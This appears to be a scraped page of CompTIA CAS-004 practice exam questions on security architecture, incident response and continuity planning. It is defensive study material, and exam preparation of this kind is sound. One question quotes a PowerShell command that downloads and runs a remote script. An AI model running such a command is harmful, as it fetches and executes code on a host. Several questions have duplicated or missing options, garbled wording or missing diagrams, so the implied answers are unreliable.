A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a ''Contact US'' form. The analyst must determine if the increase in website traffic is due to a recent marketing campaign of if this is a potential incident. Which of the following would BEST assist the analyst?

Running the website log files through a log reduction and analysis tool

Ensuring proper input validation is configured on the ''Contact US'' form

Deploy a WAF in front of the public website

Checking for new rules from the inbound network IPS vendor

Running the website log files through a log reduction and analysis tool

A company is repeatedly being breached by hackers who valid credentials. The company's Chief information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls. Which of the following recommendation would MOST likely reduce the risk of unauthorized access?

Implement strict three-factor authentication.

Implement least privilege policies

Switch to one-time or all user authorizations.

Strengthen identify-proofing procedures

A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated Oss. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

Migrate the services to new systems with a supported and patched OS.

Segment the systems to reduce the attack surface if an attack occurs

Migrate the services to new systems with a supported and patched OS.

Patch the systems to the latest versions of the existing OSs

Install anti-malware. HIPS, and host-based firewalls on each of the systems

An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Select TWO.)

Hardware-backed public key storage

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whoisWhich of the following security controls would have alerted and prevented the next phase of the attack?

EDR and application approved list

An engineering team is developing and deploying a fleet of mobile devices to be used for specialized inventory management purposes. These devices should:* Be based on open-source Android for user familiarity and ease.* Provide a single application for inventory management of physical assets.* Permit use of the camera be only the inventory application for the purposes of scanning* Disallow any and all configuration baseline modifications.* Restrict all access to any device resource other than those requirement ?

Set an application wrapping policy, wrap the application, distributes the inventory APK via the MAM tool, and test the application restrictions.

Write a MAC sepolicy that defines domains with rules, label the inventory application, build the policy, and set to enforcing mode.

Swap out Android Linux kernel version for >2,4,0, but the internet build Android, remove unnecessary functions via MDL, configure to block network access, and perform integration testing

Build and install an Android middleware policy with requirements added, copy the file into/ user/init, and then built the inventory application.

A company's employees are not permitted to access company systems while traveling internationally. The company email system is configured to block logins based on geographic location, but some employees report their mobile phones continue to sync email traveling . Which of the following is the MOST likely explanation? (Select TWO.)

Unrestricted email administrator accounts

A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative , the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team?

Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.

Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events.

Create an SLA for each application that states when the application will come back online and distribute this information to the business units.

Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.

Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.

An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:Low latency for all mobile users to improve the users' experienceSSL offloading to improve web server performanceProtection against DoS and DDoS attacksHigh availabilityWhich of the following should the organization implement to BEST ensure all requirements are met?

A load-balanced group of reverse proxy servers with SSL acceleration

A cache server farm in its datacenter

A load-balanced group of reverse proxy servers with SSL acceleration

A CDN with the origin set to its datacenter

Dual gigabit-speed Internet connections with managed DDoS prevention

A security architect is reviewing the following proposed corporate firewall architecture and configuration: Both firewalls are stateful and provide Layer 7 filtering and routing. The company has the following requirements:Web servers must receive all updates via HTTP/S from the corporate network.Web servers should not initiate communication with the Internet.Web servers should only connect to preapproved corporate database servers.Employees' computing devices should only connect to web services over ports 80 and 443.Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open:2225110137138139445Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company's distribution process.Which of the following would be the BEST solution to harden the system?

Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.

Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.

Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface.

Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.

A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.Which of the following should a security architect recommend?

A CRM application to consolidate the data and provision access based on the process and need

A DLP program to identify which files have customer data and delete them

An ERP program to identify which processes need to be tracked

A CMDB to report on systems that are not configured to security baselines

A CRM application to consolidate the data and provision access based on the process and need

A security analyst observes the following while looking through network traffic in a company's cloud log: Which of the following steps should the security analyst take FIRST?

Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

Quarantine 10.0.5.52 and run a malware scan against the host.

Access 10.0.5.52 via EDR and identify processes that have network connections.

Isolate 10.0.50.6 via security groups.

Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.Which of the following should the organization consider FIRST to address this requirement?

Identify critical business processes and determine associated software and hardware requirements.

Implement a change management plan to ensure systems are using the appropriate versions.

Hire additional on-call staff to be deployed if an event occurs.

Design an appropriate warm site for business continuity.

Identify critical business processes and determine associated software and hardware requirements.

Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

when it is passed across a local network.

when it is written to a system's solid-state drive.

by an enterprise hardware security module.

An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.Which of the following designs would be BEST for the CISO to use?

Adding a second redundant layer of alternate vendor VPN concentrators

Using Base64 encoding within the existing site-to-site VPN connections

Distributing security resources across VPN sites

Implementing IDS services with each VPN concentrator

Transitioning to a container-based architecture for site-based services

An organization's assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.Given this information, which of the following is a noted risk?

Feature delay due to extended software development cycles

Financial liability from a vendor data breach

Technical impact to the API configuration

The possibility of the vendor's business ceasing operations

A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the network?

Multiple solicited responses over time

Packets that are the wrong size or length

Use of any non-DNP3 communication on a DNP3 port

Multiple solicited responses over time

Application of an unsupported encryption algorithm

A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.Which of the following techniques would BEST support this?

Configuring systemd services to run automatically at startup

Exploiting an arbitrary code execution exploit

Moving laterally to a more authoritative server/service

CompTIA CAS-004 Practice Test 4 - Free Online Exam Questions 121-160

A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.

Become a Premium Member for full access

Unlock Premium Member

CompTIA CAS-004 Practice Test 4

Question

CompTIA CAS-004 Practice Tests

Practice Tests